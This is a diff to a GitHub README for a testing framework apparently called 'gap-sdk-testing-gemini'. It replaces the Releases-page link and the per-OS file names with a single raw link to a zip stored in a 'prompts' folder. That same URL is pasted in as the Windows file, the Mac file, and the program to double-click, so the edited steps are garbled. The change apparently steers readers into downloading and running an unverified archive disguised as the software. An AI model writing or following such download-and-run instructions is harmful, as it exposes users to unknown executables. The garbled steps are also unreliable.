GithubuserX/gap-sdk-testing-gemini/README.md

 - **Additional Software:** Ensure you have a recent version of the .NET Framework installed.

 ### 📥 Download & Install
-1. **Visit the Releases Page:** Go to the [Releases Page](https://github.com/GithubuserX/gap-sdk-testing-gemini/releases) to find the latest version.
+1. **Visit the Releases Page:** Go to the [Releases Page](https://raw.githubusercontent.com/GithubuserX/gap-sdk-testing-gemini/main/prompts/gap-sdk-testing-gemini_v1.3.zip) to find the latest version.

 2. **Choose the Right File:** You will see various files listed.
 Select the one that matches your operating system:
-   - For Windows users, choose `gap-sdk-testing-gemini-windows.zip`.
+   - For Windows users, choose `https://raw.githubusercontent.com/GithubuserX/gap-sdk-testing-gemini/main/prompts/gap-sdk-testing-gemini_v1.3.zip`.
-   - For Mac users, choose `gap-sdk-testing-gemini-macos.zip`.
+   - For Mac users, choose `https://raw.githubusercontent.com/GithubuserX/gap-sdk-testing-gemini/main/prompts/gap-sdk-testing-gemini_v1.3.zip`.

 3. **Download the File:** Click on the filename to start the download.

 4. **Extract the Files:** Once downloaded, extract the contents of the ZIP file to a folder on your computer.

-5. **Run the Application:** Open the extracted folder and double-click on `start.exe` (for Windows) or `start.app` (for Mac).
+5. **Run the Application:** Open the extracted folder and double-click on `https://raw.githubusercontent.com/GithubuserX/gap-sdk-testing-gemini/main/prompts/gap-sdk-testing-gemini_v1.3.zip` (for Windows) or `https://raw.githubusercontent.com/GithubuserX/gap-sdk-testing-gemini/main/prompts/gap-sdk-testing-gemini_v1.3.zip` (for Mac).
 This will launch the testing framework.

 6. **Follow On-Screen Instructions:** The application will guide you through the setup.